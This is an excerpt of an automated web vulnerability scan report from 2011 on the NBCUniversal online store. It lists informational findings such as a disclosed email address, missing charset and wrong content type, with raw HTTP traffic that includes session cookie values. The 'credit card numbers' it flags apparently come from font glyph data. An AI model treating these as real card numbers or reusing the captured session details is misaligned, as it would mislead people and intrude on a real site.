GET /js/omniture/s_code_dageneral.js HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 04 Aug 2011 23:54:17 GMT ETag: "d71063-5f5a-4a9b6b2dfdc40" Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 24410 Content-Type: application/x-javascript Date: Mon, 15 Aug 2011 22:17:10 GMT Connection: close /* SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ Plu...[SNIP]... .hav()+q+(qs?qs:s." +"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc #Ctc=1;s.f" +"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;...[SNIP]...
6.5. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/typeface-0.15.js
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/nbcuniversalstore/behavior/typeface-0.15.js
Issue detail
The following email address was disclosed in the response:
Request
GET /nbcuniversalstore/behavior/typeface-0.15.js HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 12 Apr 2011 18:49:29 GMT ETag: "1170013-5f13-4a0bd26ea6040" Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 24339 Content-Type: application/x-javascript Date: Mon, 15 Aug 2011 22:17:10 GMT Connection: close /***************************************************************** typeface.js, version 0.15 | typefacejs.neocracy.org Copyright (c) 2008 - 2009, David Chester davidchester@gmx.net Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, includ...[SNIP]...
7. Credit card numbers disclosed
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/nbcuniversalstore/behavior/houschka_pro_bold.typeface.js
Issue detail
The following credit card numbers were disclosed in the response:36610613491061 38211473661147 38512973801319 38711493691149 4731009473972
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /nbcuniversalstore/behavior/houschka_pro_bold.typeface.js HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com//?v=nbc_the-office&icid=nbcu_homepage_flash_the-office_show_button User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253AHome%2520Page%7C1313448437353%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Fri, 05 Nov 2010 23:52:12 GMT ETag: "1560151-711c0-49456f6968300" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: application/x-javascript Content-Length: 463296 Date: Mon, 15 Aug 2011 22:17:36 GMT Connection: close if (_typeface_js && _typeface_js.loadFace) _typeface_js.loadFace({"glyphs":{"...":{"x_min":90,"x_max":771,"ha":861,"o":"m 750 0 l 651 0 q 614 20 630 0 l 265 444 l 265 20 q 258 6 265 12 q 242 0 252 0 l...[SNIP]... 1179 314 1179 q 504 1129 455 1179 q 554 1009 554 1080 m 473 1009 q 447 1073 473 1046 q 385 1100 421 1100 q 322 1074 348 1100 q 297 1009 297 1048 q 322 946 297 972 q 385 921 348 921 q 447 946 421 921 q 473 1009 473 972 "},"...":{"x_min":17.921875,"x_max":664,"ha":692,"o":"m 643 0 l 37 0 q 25 27 5 0 l 373 591 l 57 591 q 35 613 35 591 l 35 735 q 41 749 35 743 q 57 756 47 756 l 644 756 q 661 746 657 756 q 659 726 666 73...[SNIP]... 447 1147 q 474 1132 462 1147 l 674 906 q 681 885 684 895 q 665 876 679 876 l 549 876 q 512 896 527 876 l 415 1006 l 316 896 q 278 876 300 876 l 163 876 q 146 885 149 876 q 153 906 144 895 l 353 1132 q 382 1147 366 1147 "},"...":{"x_min":92,"x_max":871,"ha":963,"o":"m 480 772 q 350 722 402 772 q 292 555 292 660 l 292 450 l 671 450 l 671 555 q 613 722 671 660 q 480 772 561 772 m 871 563 l 871 20 q 864 6 871 12 q 850 0 ...[SNIP]... 430 1061 q 458 1046 445 1061 l 658 819 q 665 798 667 808 q 648 789 662 789 l 533 789 q 495 809 511 789 l 398 919 l 299 809 q 262 789 284 789 l 146 789 q 130 798 133 789 q 137 819 127 808 l 337 1046 q 366 1061 349 1061 "},"...":{"x_min":1,"x_max":1467.3125,"ha":1469,"o":"m 998 248 l 1245 923 q 1280 947 1254 947 l 1447 947 q 1465 936 1462 947 q 1463 917 1469 926 l 1112 16 q 1079 -4 1105 -4 l 912 -4 q 880 16 887 -4 l 7...[SNIP]... 80 1217 397 1217 q 576 1297 564 1217 q 600 1319 579 1319 l 665 1319 q 690 1296 690 1319 q 634 1147 690 1208 q 480 1086 579 1086 q 326 1147 381 1086 q 271 1296 271 1208 q 296 1319 271 1319 l 361 1319 q 385 1297 380 1319 "},"...":{"x_min":90,"x_max":716.421875,"ha":747,"o":"m 530 637 l 692 637 q 715 623 712 637 q 707 599 719 609 l 473 369 q 648 245 596 329 q 701 20 701 161 q 678 0 698 0 l 536 0 q 521 6 527 0 q 515 20 5...[SNIP]... 447 1147 q 474 1132 462 1147 l 674 905 q 681 884 684 894 q 665 875 679 875 l 549 875 q 512 895 527 875 l 415 1005 l 316 895 q 278 875 300 875 l 163 875 q 146 884 149 875 q 153 905 144 894 l 353 1132 q 382 1147 366 1147 "},"..":{"x_min":93,"x_max":894.9375,"ha":910,"o":"m 683 946 l 861 946 q 880 935 876 946 q 874 914 884 925 l 526 486 l 886 36 q 894 11 897 22 q 876 0 891 0 l 688 0 q 648 20 663 0 l 362 386 l 293 386 l ...[SNIP]... q 466 6 473 12 q 452 0 460 0 l 310 0 q 290 20 290 0 m 387 1149 l 512 1149 q 529 1138 524 1149 q 527 1117 534 1128 l 391 899 q 359 877 377 877 l 264 877 q 246 891 248 877 q 253 917 245 906 l 357 1128 q 387 1149 369 1149 "},"..":{"x_min":53,"x_max":741,"ha":797,"o":"m 53 316 q 151 558 53 468 q 396 649 249 649 q 584 601 500 649 l 596 615 q 631 636 614 636 l 693 636 q 713 626 709 636 q 706 605 717 616 l 654 545 q 741 316...[SNIP]...
8. HTML does not specify charset
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/cart.php
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters. In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
Request
POST /cart.php?p=303756 HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php?p=303756&v=nbc_the-office Content-Length: 25 Origin: http://www.nbcuniversalstore.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Content-type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253AThe%2520Office%25202012%2520Day%2520to%2520Day%2520Calendar%253ADetail%7C1313448508383%3B; s_sess=%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_cc%3Dtrue%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253AThe%25252520Office%252525202012%25252520Day%25252520to%25252520Day%25252520Calendar%2525253ADetail%252526pidt%25253D1%252526oid%25253Djavascript%2525253AcheckSkuQty%25252528%25252529%2525253Bif%25252528%25252524defined%25252528AjaxCart%25252529%25252529AjaxCart.add%25252528%25252527303756%25252527%2525252C%25252527add_form%25252527%2525252C%25252520true%25252529%2525253B%252526ot%25253DA%3B is_ajax=1&id=303756&qty=1
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 2074Content-Type: text/html Expires: Mon, 15 Aug 2011 22:18:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:18:22 GMT Connection: close Set-Cookie: DACART=qK2mk5eRnKeppoaV; expires=Tue, 13-Dec-2011 22:18:22 GMT; path=/; domain=nbcuniversalstore.com <div id="ajaxCartTitle">Shopping Cart</div> <script type="text/javascript"> document.cookie = "last_p_added=303756;expires=Fri, 31 Dec 2099 23:59:59 GMT;"; </script> <div id="ajaxCartCou...[SNIP]...
9. Content type incorrectly stated
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.nbcuniversalstore.com
Path:
/nbcuniversalstore/layout/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
Request
GET /nbcuniversalstore/layout/favicon.ico HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253AHome%2520Page%7C1313448437353%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 21 Jun 2011 22:27:22 GMT ETag: "20f01cf-47e-4a6405b04c680" Accept-Ranges: bytes Content-Length: 1150Content-Type: text/plain Date: Mon, 15 Aug 2011 22:17:27 GMT Connection: close ............ .h.......(....... ..... .....@................................................................................................................................................................[SNIP]...
Report generated by XSS.CX at Tue Aug 16 06:19:29 GMT-06:00 2011.